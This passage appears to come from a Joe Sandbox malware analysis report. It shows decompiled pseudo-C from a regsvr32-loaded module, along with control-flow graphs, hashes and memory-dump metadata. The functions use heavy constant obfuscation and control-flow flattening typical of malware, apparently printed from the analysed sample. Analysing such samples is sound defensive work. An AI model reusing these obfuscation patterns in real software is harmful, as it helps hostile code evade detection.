                                                                                                                				void* _t441;
                                                                                                                				signed int _t443;
                                                                                                                				signed int* _t445;
                                                                                                                
                                                                                                                				_t445 =  &_v160;
                                                                                                                				_v12 = 0xacebf2;
                                                                                                                				_v8 = 0x745816;
                                                                                                                				_t393 = 0;
                                                                                                                				_v4 = _v4 & 0;
                                                                                                                				_v80 = 0x783526;
                                                                                                                				_t6 =  &_v80; // 0x783526
                                                                                                                				_v80 =  *_t6 * 0x24;
                                                                                                                				_t441 = 0xdedff95;
                                                                                                                				_t395 = 0xa;
                                                                                                                				_v80 = _v80 / _t395;
                                                                                                                				_v80 = _v80 ^ 0x01b0bf55;
                                                                                                                				_v160 = 0xc625e;
                                                                                                                				_v160 = _v160 + 0xffffe0ff;
                                                                                                                				_v160 = _v160 + 0xffffb449;
                                                                                                                				_v160 = _v160 << 0xa;
                                                                                                                				_v160 = _v160 ^ 0x2fde9800;
                                                                                                                				_v144 = 0xa61bd8;
                                                                                                                				_v144 = _v144 + 0x3bcb;
                                                                                                                				_v144 = _v144 | 0x065677fe;
                                                                                                                				_v144 = _v144 ^ 0x68cebb05;
                                                                                                                				_v144 = _v144 ^ 0x6e38ccfa;
                                                                                                                				_v128 = 0xde23d2;
                                                                                                                				_v128 = _v128 + 0x8eb5;
                                                                                                                				_v128 = _v128 + 0xffffc326;
                                                                                                                				_v128 = _v128 >> 5;
                                                                                                                				_v128 = _v128 ^ 0x0006f3ad;
                                                                                                                				_v92 = 0xb44e92;
                                                                                                                				_v92 = _v92 | 0x1f66e038;
                                                                                                                				_t396 = 0x14;
                                                                                                                				_v92 = _v92 * 0x76;
                                                                                                                				_v92 = _v92 ^ 0xbbd209bc;
                                                                                                                				_v64 = 0x80ba81;
                                                                                                                				_v64 = _v64 * 0x55;
                                                                                                                				_v64 = _v64 ^ 0x2ab3afb2;
                                                                                                                				_v124 = 0xfee98f;
                                                                                                                				_v124 = _v124 | 0x67c29a26;
                                                                                                                				_v124 = _v124 + 0x3e3b;
                                                                                                                				_v124 = _v124 ^ 0xc76fbb77;
                                                                                                                				_v124 = _v124 ^ 0xa09e23ce;
                                                                                                                				_v108 = 0xc571e;
                                                                                                                				_v108 = _v108 ^ 0x84310f68;
                                                                                                                				_v108 = _v108 >> 5;
                                                                                                                				_v108 = _v108 ^ 0x0423c0b1;
                                                                                                                				_v156 = 0x55cd54;
                                                                                                                				_v156 = _v156 + 0xffff433f;
                                                                                                                				_v156 = _v156 >> 5;
                                                                                                                				_v156 = _v156 + 0xe745;
                                                                                                                				_v156 = _v156 ^ 0x000a2489;
                                                                                                                				_v48 = 0xb3e979;
                                                                                                                				_v48 = _v48 + 0xffffd088;
                                                                                                                				_v48 = _v48 ^ 0x00bc8ea1;
                                                                                                                				_v88 = 0x8f2b22;
                                                                                                                				_v88 = _v88 * 0x38;
                                                                                                                				_v88 = _v88 / _t396;
                                                                                                                				_v88 = _v88 ^ 0x01988a7e;
                                                                                                                				_v32 = 0x6b050d;
                                                                                                                				_v32 = _v32 * 0x60;
                                                                                                                				_v32 = _v32 ^ 0x2826338f;
                                                                                                                				_v56 = 0xe7b4ca;
                                                                                                                				_v56 = _v56 >> 3;
                                                                                                                				_v56 = _v56 ^ 0x001daa9f;
                                                                                                                				_v40 = 0xcb9e36;
                                                                                                                				_v40 = _v40 * 0x31;
                                                                                                                				_v40 = _v40 ^ 0x26fbe1c0;
                                                                                                                				_v20 = 0x20dad8;
                                                                                                                				_t397 = 0x79;
                                                                                                                				_v20 = _v20 * 0x5f;
                                                                                                                				_v20 = _v20 ^ 0x0c309b8e;
                                                                                                                				_v148 = 0x1d631f;
                                                                                                                				_v148 = _v148 | 0x3b059b9e;
                                                                                                                				_v148 = _v148 * 0x26;
                                                                                                                				_v148 = _v148 | 0xcb3f565a;
                                                                                                                				_v148 = _v148 ^ 0xcf7bf540;
                                                                                                                				_v104 = 0xaf48b6;
                                                                                                                				_v104 = _v104 / _t397;
                                                                                                                				_t398 = 0x3d;
                                                                                                                				_v104 = _v104 * 0x3d;
                                                                                                                				_v104 = _v104 ^ 0x0053dd31;
                                                                                                                				_v96 = 0x834442;
                                                                                                                				_v96 = _v96 | 0x95a671eb;
                                                                                                                				_v96 = _v96 >> 6;
                                                                                                                				_v96 = _v96 ^ 0x0250c20a;
                                                                                                                				_v140 = 0xf136e8;
                                                                                                                				_v140 = _v140 / _t398;
                                                                                                                				_v140 = _v140 >> 4;
                                                                                                                				_t399 = 0x3e;
                                                                                                                				_v140 = _v140 * 0x36;
                                                                                                                				_v140 = _v140 ^ 0x000bb008;
                                                                                                                				_v132 = 0x9b8a4b;
                                                                                                                				_v132 = _v132 >> 7;
                                                                                                                				_v132 = _v132 + 0xffff5857;
                                                                                                                				_v132 = _v132 ^ 0x382c70fc;
                                                                                                                				_v132 = _v132 ^ 0x3820d223;
                                                                                                                				_v72 = 0xca972b;
                                                                                                                				_v72 = _v72 >> 0xe;
                                                                                                                				_v72 = _v72 + 0xa3b3;
                                                                                                                				_v72 = _v72 ^ 0x000660a2;
                                                                                                                				_v112 = 0x9668b1;
                                                                                                                				_v112 = _v112 / _t399;
                                                                                                                				_v112 = _v112 + 0xffffa1e8;
                                                                                                                				_v112 = _v112 ^ 0x00047e1e;
                                                                                                                				_v60 = 0xec057f;
                                                                                                                				_t400 = 0x18;
                                                                                                                				_v60 = _v60 / _t400;
                                                                                                                				_v60 = _v60 ^ 0x0004248a;
                                                                                                                				_v152 = 0xaf1b98;
                                                                                                                				_v152 = _v152 + 0xffffc000;
                                                                                                                				_v152 = _v152 + 0x3c9d;
                                                                                                                				_v152 = _v152 << 0xf;
                                                                                                                				_v152 = _v152 ^ 0x8c1f37ac;
                                                                                                                				_v24 = 0xbb2b7;
                                                                                                                				_v24 = _v24 >> 0xa;
                                                                                                                				_v24 = _v24 ^ 0x000415b0;
                                                                                                                				_v100 = 0x2e64c5;
                                                                                                                				_v100 = _v100 + 0xac1f;
                                                                                                                				_v100 = _v100 | 0xbf901060;
                                                                                                                				_v100 = _v100 ^ 0xbfb82aad;
                                                                                                                				_v52 = 0xb062e9;
                                                                                                                				_v52 = _v52 * 0xd;
                                                                                                                				_v52 = _v52 ^ 0x08f07c1d;
                                                                                                                				_v136 = 0x3e171f;
                                                                                                                				_t401 = 0x16;
                                                                                                                				_v136 = _v136 / _t401;
                                                                                                                				_v136 = _v136 + 0xffff5a49;
                                                                                                                				_t402 = 0x3c;
                                                                                                                				_v136 = _v136 / _t402;
                                                                                                                				_v136 = _v136 ^ 0x000ead41;
                                                                                                                				_v116 = 0x1808cc;
                                                                                                                				_v116 = _v116 << 6;
                                                                                                                				_v116 = _v116 + 0xffff73dd;
                                                                                                                				_v116 = _v116 ^ 0x060db815;
                                                                                                                				_v44 = 0xaaa2e7;
                                                                                                                				_t403 = 0x25;
                                                                                                                				_v44 = _v44 / _t403;
                                                                                                                				_v44 = _v44 ^ 0x000b9c4a;
                                                                                                                				_v84 = 0xb9ac52;
                                                                                                                				_v84 = _v84 * 0x4b;
                                                                                                                				_v84 = _v84 + 0xffff0412;
                                                                                                                				_v84 = _v84 ^ 0x36642c26;
                                                                                                                				_v120 = 0x38e985;
                                                                                                                				_v120 = _v120 + 0x7f75;
                                                                                                                				_v120 = _v120 << 0xc;
                                                                                                                				_v120 = _v120 >> 0xe;
                                                                                                                				_v120 = _v120 ^ 0x000ddd34;
                                                                                                                				_v28 = 0x96a606;
                                                                                                                				_v28 = _v28 + 0xffffc2ff;
                                                                                                                				_v28 = _v28 ^ 0x009e32bf;
                                                                                                                				_v36 = 0x8dc247;
                                                                                                                				_v36 = _v36 << 0x10;
                                                                                                                				_v36 = _v36 ^ 0xc24b65bb;
                                                                                                                				_v68 = 0xf7683e;
                                                                                                                				_v68 = _v68 + 0xffff4933;
                                                                                                                				_v68 = _v68 >> 9;
                                                                                                                				_v68 = _v68 ^ 0x00022a30;
                                                                                                                				_v76 = 0xf36025;
                                                                                                                				_v76 = _v76 << 5;
                                                                                                                				_v76 = _v76 >> 0xf;
                                                                                                                				_v76 = _v76 ^ 0x000eba4b;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					while(1) {
                                                                                                                						_t370 = 0x53a87df;
                                                                                                                						do {
                                                                                                                							L3:
                                                                                                                							if(_t441 == 0x1b3122a) {
                                                                                                                								E001B2519(_v44, _v16, _v84, _v92, _v120);
                                                                                                                								_t445 =  &(_t445[3]);
                                                                                                                								_t441 = 0x5ace2c9;
                                                                                                                								L16:
                                                                                                                								_t434 =  *0x1c4c0c; // 0x679040
                                                                                                                								_t370 = 0x53a87df;
                                                                                                                								goto L17;
                                                                                                                							}
                                                                                                                							if(_t441 == _t370) {
                                                                                                                								_t372 =  *0x1c4c0c; // 0x679040
                                                                                                                								_t327 = _t372 + 0xc; // 0x4000
                                                                                                                								_t328 = _t372 + 8; // 0x679098
                                                                                                                								_t405 = _v100;
                                                                                                                								_t373 = E001A9291(_t405, _v16, _v52, _v136, _v116,  *_t328,  *_t327, _v144); // executed
                                                                                                                								_t445 =  &(_t445[6]);
                                                                                                                								__eflags = _t373 - _v128;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t441 = 0xe646deb;
                                                                                                                								} else {
                                                                                                                									_t441 = 0x1b3122a;
                                                                                                                									_t393 = 1;
                                                                                                                								}
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							if(_t441 == 0x740ce5d) {
                                                                                                                								_push(_v104);
                                                                                                                								_push(0x1a1870);
                                                                                                                								_push(_v148);
                                                                                                                								_t443 = E001BF5D9(_v40, _v20, __eflags);
                                                                                                                								_t376 = E001AD2C9(_t443, _v80, _v96, _v140,  &_v16, _v132, _v72, 0); // executed
                                                                                                                								__eflags = _t376 - _v160;
                                                                                                                								_t405 = _t443;
                                                                                                                 								_t441 = (_t376 == _v160) ? 0x53a87df : 0xe646deb;
                                                                                                                								E001BF94B(_t405, _v112, _v60, _v152, _v24);
                                                                                                                								_t445 =  &(_t445[0xc]);
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							if(_t441 == 0xdedff95) {
                                                                                                                								_push(_t405);
                                                                                                                								_t383 = E001A303A(_t405, 0x4c);
                                                                                                                								 *0x1c4c0c = _t383;
                                                                                                                								 *((intOrPtr*)(_t383 + 0xc)) = 0x4000;
                                                                                                                								_t388 =  *0x1c4c0c; // 0x679040
                                                                                                                								_t305 = _t388 + 0xc; // 0x4000
                                                                                                                								_t389 = E001A303A(_t405,  *_t305);
                                                                                                                								_t434 =  *0x1c4c0c; // 0x679040
                                                                                                                								_t445 =  &(_t445[5]);
                                                                                                                								_t441 = 0x740ce5d;
                                                                                                                								_t306 = _t434 + 0xc; // 0x4000
                                                                                                                								_t405 =  *_t306 + _t389;
                                                                                                                								 *((intOrPtr*)(_t434 + 8)) = _t389;
                                                                                                                								 *((intOrPtr*)(_t434 + 0x10)) = _t389;
                                                                                                                								 *((intOrPtr*)(_t434 + 0x34)) = _t389;
                                                                                                                								 *(_t434 + 0x2c) = _t405;
                                                                                                                								_t370 = 0x53a87df;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							if(_t441 != 0xe646deb) {
                                                                                                                								goto L17;
                                                                                                                							}
                                                                                                                							_t291 = _t434 + 8; // 0x679098
                                                                                                                							E001B17D2(_v28, _v36,  *_t291);
                                                                                                                							E001B17D2(_v68, _v76,  *0x1c4c0c);
                                                                                                                							L9:
                                                                                                                							return _t393;
                                                                                                                							L17:
                                                                                                                							__eflags = _t441 - 0x5ace2c9;
                                                                                                                						} while (__eflags != 0);
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &,d6$&5x$;>$E
                                                                                                                • API String ID: 0-3806806301
                                                                                                                • Opcode ID: a42b0dc3641da82b84a91461792c61a879e2fc099c657bd2bdbfd80d89ebd9ef
                                                                                                                • Instruction ID: c98ce904117e60ee66694e4fb9e3b331114cb5af038c5f2ba440c0a3d54c5bde
                                                                                                                • Opcode Fuzzy Hash: a42b0dc3641da82b84a91461792c61a879e2fc099c657bd2bdbfd80d89ebd9ef
                                                                                                                • Instruction Fuzzy Hash: 21020FB25093809FD3A8CF65C58AA4BFBE1FBC5718F508A1DF19986260D7B18949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 679 1a82d2-1a8553 680 1a855b-1a855d 679->680 681 1a855f-1a8565 680->681 682 1a85d2-1a8635 call 1bf5d9 call 1b8eb3 call 1bf94b 680->682 684 1a856b-1a856d 681->684 685 1a8648-1a8658 call 1a8fe9 681->685 697 1a863a-1a8640 682->697 687 1a856f-1a8575 684->687 688 1a85b1-1a85d0 call 1c0575 684->688 694 1a865d-1a865e 685->694 692 1a85ad-1a85af 687->692 693 1a8577-1a857d 687->693 688->680 692->680 693->697 698 1a8583-1a8597 call 1a4b40 693->698 699 1a865f-1a866b 694->699 697->680 701 1a8646 697->701 704 1a859c-1a85ab 698->704 701->699 704->680
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001A82D2() {
                                                                                                                				char _v520;
                                                                                                                				char _v1040;
                                                                                                                				signed int _v1044;
                                                                                                                				signed int _v1048;
                                                                                                                				signed int _v1052;
                                                                                                                				signed int _v1056;
                                                                                                                				signed int _v1060;
                                                                                                                				signed int _v1064;
                                                                                                                				signed int _v1068;
                                                                                                                				signed int _v1072;
                                                                                                                				signed int _v1076;
                                                                                                                				signed int _v1080;
                                                                                                                				signed int _v1084;
                                                                                                                				signed int _v1088;
                                                                                                                				signed int _v1092;
                                                                                                                				signed int _v1096;
                                                                                                                				signed int _v1100;
                                                                                                                				signed int _v1104;
                                                                                                                				signed int _v1108;
                                                                                                                				signed int _v1112;
                                                                                                                				signed int _v1116;
                                                                                                                				signed int _v1120;
                                                                                                                				void* _t184;
                                                                                                                				intOrPtr _t186;
                                                                                                                				void* _t196;
                                                                                                                				void* _t219;
                                                                                                                				signed int _t220;
                                                                                                                				signed int _t221;
                                                                                                                				signed int* _t224;
                                                                                                                
                                                                                                                				_t224 =  &_v1120;
                                                                                                                				_v1056 = 0xa8f91e;
                                                                                                                				_v1056 = _v1056 + 0xffff39ba;
                                                                                                                				_t196 = 0x9dd1674;
                                                                                                                				_v1056 = _v1056 ^ 0x00a16c3b;
                                                                                                                				_v1100 = 0xe0948e;
                                                                                                                				_v1100 = _v1100 ^ 0x18edfd50;
                                                                                                                				_v1100 = _v1100 >> 4;
                                                                                                                				_v1100 = _v1100 >> 2;
                                                                                                                				_v1100 = _v1100 ^ 0x0064ab7c;
                                                                                                                				_v1064 = 0x301903;
                                                                                                                				_v1064 = _v1064 << 6;
                                                                                                                				_v1064 = _v1064 ^ 0x0c0c0596;
                                                                                                                				_v1072 = 0x29508e;
                                                                                                                				_v1072 = _v1072 ^ 0x1cc21636;
                                                                                                                				_v1072 = _v1072 * 0x43;
                                                                                                                				_t219 = 0;
                                                                                                                				_v1072 = _v1072 ^ 0x919bedb4;
                                                                                                                				_v1044 = 0xea4c7f;
                                                                                                                				_v1044 = _v1044 << 0xc;
                                                                                                                				_v1044 = _v1044 ^ 0xa4cb97a2;
                                                                                                                				_v1120 = 0x37421e;
                                                                                                                				_t220 = 0x6b;
                                                                                                                				_v1120 = _v1120 / _t220;
                                                                                                                				_v1120 = _v1120 ^ 0xd80d84f5;
                                                                                                                				_t221 = 0x7f;
                                                                                                                				_v1120 = _v1120 * 0x28;
                                                                                                                				_v1120 = _v1120 ^ 0xc20f1c8f;
                                                                                                                				_v1108 = 0xfc8edc;
                                                                                                                				_v1108 = _v1108 + 0xffffd2a1;
                                                                                                                				_v1108 = _v1108 >> 3;
                                                                                                                				_v1108 = _v1108 << 6;
                                                                                                                				_v1108 = _v1108 ^ 0x07e32526;
                                                                                                                				_v1060 = 0x5750b;
                                                                                                                				_v1060 = _v1060 >> 2;
                                                                                                                				_v1060 = _v1060 ^ 0x0005da91;
                                                                                                                				_v1112 = 0xf2ea77;
                                                                                                                				_v1112 = _v1112 + 0xffff512d;
                                                                                                                				_v1112 = _v1112 << 6;
                                                                                                                				_v1112 = _v1112 | 0xcd991649;
                                                                                                                				_v1112 = _v1112 ^ 0xfd9c26f2;
                                                                                                                				_v1048 = 0x7191b2;
                                                                                                                				_v1048 = _v1048 ^ 0x9ee77789;
                                                                                                                				_v1048 = _v1048 ^ 0x9e9352cd;
                                                                                                                				_v1080 = 0xf20b24;
                                                                                                                				_v1080 = _v1080 | 0xffdefffb;
                                                                                                                				_v1080 = _v1080 ^ 0xfff5cd3a;
                                                                                                                				_v1076 = 0xc6dae7;
                                                                                                                				_v1076 = _v1076 ^ 0xf7c79165;
                                                                                                                				_v1076 = _v1076 + 0x291;
                                                                                                                				_v1076 = _v1076 ^ 0xf704a098;
                                                                                                                				_v1084 = 0x9dd956;
                                                                                                                				_v1084 = _v1084 / _t221;
                                                                                                                				_v1084 = _v1084 | 0xa6924978;
                                                                                                                				_v1084 = _v1084 ^ 0xa69c7e35;
                                                                                                                				_v1092 = 0xf4dbbc;
                                                                                                                				_v1092 = _v1092 + 0xfd99;
                                                                                                                				_v1092 = _v1092 * 0x26;
                                                                                                                				_v1092 = _v1092 ^ 0x247b4c14;
                                                                                                                				_v1104 = 0x8f829a;
                                                                                                                				_v1104 = _v1104 + 0x89ca;
                                                                                                                				_v1104 = _v1104 << 0xa;
                                                                                                                				_v1104 = _v1104 | 0x9fe15c92;
                                                                                                                				_v1104 = _v1104 ^ 0xdff17ae9;
                                                                                                                				_v1088 = 0x6b376e;
                                                                                                                				_v1088 = _v1088 | 0xe6fa501d;
                                                                                                                				_v1088 = _v1088 * 0x16;
                                                                                                                				_v1088 = _v1088 ^ 0xd996acc8;
                                                                                                                				_v1116 = 0x885564;
                                                                                                                				_v1116 = _v1116 | 0x1291e10c;
                                                                                                                				_v1116 = _v1116 >> 3;
                                                                                                                				_v1116 = _v1116 ^ 0x3b656eb2;
                                                                                                                				_v1116 = _v1116 ^ 0x3934836e;
                                                                                                                				_v1052 = 0xef3bbb;
                                                                                                                				_v1052 = _v1052 + 0xffffe328;
                                                                                                                				_v1052 = _v1052 ^ 0x00e709ef;
                                                                                                                				_v1096 = 0x28e829;
                                                                                                                				_v1096 = _v1096 ^ 0x2214fa8f;
                                                                                                                				_v1096 = _v1096 >> 0xa;
                                                                                                                				_v1096 = _v1096 + 0xffffb7ce;
                                                                                                                				_v1096 = _v1096 ^ 0x000b7e42;
                                                                                                                				_v1068 = 0x21ec5d;
                                                                                                                				_v1068 = _v1068 + 0x8f15;
                                                                                                                				_v1068 = _v1068 >> 8;
                                                                                                                				_v1068 = _v1068 ^ 0x000079a0;
                                                                                                                				do {
                                                                                                                					while(_t196 != 0x1c7aae4) {
                                                                                                                						if(_t196 == 0x72e7ca4) {
                                                                                                                							E001A8FE9(_v1052,  &_v1040, _v1096, _v1068); // executed
                                                                                                                						} else {
                                                                                                                							if(_t196 == 0x976a7b6) {
                                                                                                                								E001C0575(_v1056, _v1100, __eflags, _t196,  &_v520, _v1064);
                                                                                                                								_t224 =  &(_t224[3]);
                                                                                                                								_t196 = 0x1c7aae4;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t196 == 0x9dd1674) {
                                                                                                                									_t196 = 0x976a7b6;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									_t231 = _t196 - 0xcc2bfe3;
                                                                                                                									if(_t196 != 0xcc2bfe3) {
                                                                                                                										goto L10;
                                                                                                                									} else {
                                                                                                                										E001A4B40( &_v1040, _v1088, _t231,  &_v520, _v1116); // executed
                                                                                                                										_t219 =  !=  ? 1 : _t219;
                                                                                                                										_t196 = 0x72e7ca4;
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L13:
                                                                                                                						return _t219;
                                                                                                                					}
                                                                                                                					_push(_v1108);
                                                                                                                					_push(0x1a109c);
                                                                                                                					_push(_v1120);
                                                                                                                					_t184 = E001BF5D9(_v1072, _v1044, __eflags);
                                                                                                                					_t186 =  *0x1c4c10; // 0x67d820
                                                                                                                					_t166 = _t186 + 4; // 0x67d824
                                                                                                                					E001B8EB3(_t166, __eflags, _v1060, _v1072, _v1112,  &_v1040, _v1048, _t184, _v1080);
                                                                                                                					E001BF94B(_t184, _v1076, _v1084, _v1092, _v1104);
                                                                                                                					_t224 =  &(_t224[0xd]);
                                                                                                                					_t196 = 0xcc2bfe3;
                                                                                                                					L10:
                                                                                                                					__eflags = _t196 - 0x62c7c59;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L13;
                                                                                                                			}
                                                                                                                0x001a84c6
                                                                                                                0x001a84cf
                                                                                                                0x001a84dc
                                                                                                                0x001a84e4
                                                                                                                0x001a84ec
                                                                                                                0x001a84f1
                                                                                                                0x001a84f9
                                                                                                                0x001a8501
                                                                                                                0x001a8509
                                                                                                                0x001a8511
                                                                                                                0x001a8519
                                                                                                                0x001a8521
                                                                                                                0x001a8529
                                                                                                                0x001a852e
                                                                                                                0x001a8536
                                                                                                                0x001a853e
                                                                                                                0x001a8546
                                                                                                                0x001a854e
                                                                                                                0x001a8553
                                                                                                                0x001a855b
                                                                                                                0x001a855b
                                                                                                                0x001a8565
                                                                                                                0x001a8658
                                                                                                                0x001a856b
                                                                                                                0x001a856d
                                                                                                                0x001a85c6
                                                                                                                0x001a85cb
                                                                                                                0x001a85ce
                                                                                                                0x00000000
                                                                                                                0x001a856f
                                                                                                                0x001a8575
                                                                                                                0x001a85ad
                                                                                                                0x00000000
                                                                                                                0x001a8577
                                                                                                                0x001a8577
                                                                                                                0x001a857d
                                                                                                                0x00000000
                                                                                                                0x001a8583
                                                                                                                0x001a8597
                                                                                                                0x001a85a3
                                                                                                                0x001a85a6
                                                                                                                0x00000000
                                                                                                                0x001a85a6
                                                                                                                0x001a857d
                                                                                                                0x001a8575
                                                                                                                0x001a856d
                                                                                                                0x001a865f
                                                                                                                0x001a866b
                                                                                                                0x001a866b
                                                                                                                0x001a85d2
                                                                                                                0x001a85d6
                                                                                                                0x001a85db
                                                                                                                0x001a85e7
                                                                                                                0x001a8608
                                                                                                                0x001a860d
                                                                                                                0x001a8616
                                                                                                                0x001a862d
                                                                                                                0x001a8632
                                                                                                                0x001a8635
                                                                                                                0x001a863a
                                                                                                                0x001a863a
                                                                                                                0x001a863a
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )($]!$n7k
                                                                                                                • API String ID: 0-315496457
                                                                                                                • Opcode ID: 1ccc2cb413bfeafb619088d524111a6a7e19d26c6dd30cd7ebaaf878e1990343
                                                                                                                • Instruction ID: 09690b7365573ec8e0358af246186cc5b9bfd0383421d7acbb0b6d6d6b5a6498
                                                                                                                • Opcode Fuzzy Hash: 1ccc2cb413bfeafb619088d524111a6a7e19d26c6dd30cd7ebaaf878e1990343
                                                                                                                • Instruction Fuzzy Hash: 35913FB11093429FC398CF24D98A81FBBE1FBD4758F504A1DF58696220D7B18A49CF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001A8FE9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				char _v588;
                                                                                                                				void* _t136;
                                                                                                                				void* _t156;
                                                                                                                				signed int _t158;
                                                                                                                				signed int _t159;
                                                                                                                				signed int _t160;
                                                                                                                				signed int _t161;
                                                                                                                				signed int _t162;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t136);
                                                                                                                				_v64 = _v64 & 0x00000000;
                                                                                                                				_v68 = 0xd92827;
                                                                                                                				_v36 = 0x89238e;
                                                                                                                				_t158 = 0x47;
                                                                                                                				_v36 = _v36 * 0x32;
                                                                                                                				_v36 = _v36 ^ 0x1acd6b26;
                                                                                                                				_v36 = _v36 ^ 0x000c5763;
                                                                                                                				_v16 = 0x4622db;
                                                                                                                				_v16 = _v16 << 1;
                                                                                                                				_v16 = _v16 + 0xf0c5;
                                                                                                                				_v16 = _v16 >> 1;
                                                                                                                				_v16 = _v16 ^ 0x004e0956;
                                                                                                                				_v48 = 0x180335;
                                                                                                                				_v48 = _v48 >> 0xa;
                                                                                                                				_v48 = _v48 ^ 0x0004f932;
                                                                                                                				_v60 = 0x1a1a82;
                                                                                                                				_v60 = _v60 / _t158;
                                                                                                                				_v60 = _v60 ^ 0x0002b767;
                                                                                                                				_v44 = 0x5c92fd;
                                                                                                                				_v44 = _v44 << 6;
                                                                                                                				_v44 = _v44 ^ 0x17220be2;
                                                                                                                				_v8 = 0x385021;
                                                                                                                				_v8 = _v8 | 0x873a9563;
                                                                                                                				_t159 = 0xd;
                                                                                                                				_v8 = _v8 / _t159;
                                                                                                                				_v8 = _v8 + 0xffff7175;
                                                                                                                				_v8 = _v8 ^ 0x0a6fb94f;
                                                                                                                				_v56 = 0x69a1e5;
                                                                                                                				_t160 = 0xf;
                                                                                                                				_v56 = _v56 * 0x76;
                                                                                                                				_v56 = _v56 ^ 0x30b5a8bc;
                                                                                                                				_v40 = 0xf5e314;
                                                                                                                				_v40 = _v40 << 0xb;
                                                                                                                				_v40 = _v40 ^ 0xaf177545;
                                                                                                                				_v52 = 0x174f56;
                                                                                                                				_v52 = _v52 + 0x8d29;
                                                                                                                				_v52 = _v52 ^ 0x0014606a;
                                                                                                                				_v12 = 0xc09c5f;
                                                                                                                				_v12 = _v12 * 0x4b;
                                                                                                                				_v12 = _v12 + 0xdf67;
                                                                                                                				_v12 = _v12 >> 0xb;
                                                                                                                				_v12 = _v12 ^ 0x000668e4;
                                                                                                                				_v28 = 0xa32fd;
                                                                                                                				_v28 = _v28 << 4;
                                                                                                                				_v28 = _v28 / _t160;
                                                                                                                				_v28 = _v28 ^ 0x00099f30;
                                                                                                                				_v32 = 0xc892d8;
                                                                                                                				_v32 = _v32 + 0x9448;
                                                                                                                				_t161 = 0x50;
                                                                                                                				_v32 = _v32 * 0x65;
                                                                                                                				_v32 = _v32 ^ 0x4f57bfb7;
                                                                                                                				_v24 = 0x4ba476;
                                                                                                                				_v24 = _v24 / _t161;
                                                                                                                				_v24 = _v24 + 0xa8c6;
                                                                                                                				_v24 = _v24 ^ 0x000b7a76;
                                                                                                                				_v20 = 0x284a68;
                                                                                                                				_v20 = _v20 + 0x5280;
                                                                                                                				_v20 = _v20 + 0xffff8170;
                                                                                                                				_t162 = 0x4d;
                                                                                                                				_v20 = _v20 / _t162;
                                                                                                                				_v20 = _v20 ^ 0x000663e0;
                                                                                                                				_push(_v60);
                                                                                                                				_push(0x1a1060);
                                                                                                                				_push(_v48);
                                                                                                                				E001C1C9B(_v44, _v20, _v8, __edx, E001BF5D9(_v36, _v16, _v20), _v36, _v56, _v40);
                                                                                                                				E001BF94B(_t152, _v52, _v12, _v28, _v32);
                                                                                                                				_t156 = E001A7BC6(_v24, _v20,  &_v588); // executed
                                                                                                                				return _t156;
                                                                                                                			}



























                                                                                                                0x001a9176
                                                                                                                0x001a9182
                                                                                                                0x001a9185
                                                                                                                0x001a9188
                                                                                                                0x001a918f
                                                                                                                0x001a9192
                                                                                                                0x001a9197
                                                                                                                0x001a91bf
                                                                                                                0x001a91d2
                                                                                                                0x001a91e4
                                                                                                                0x001a91f1

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
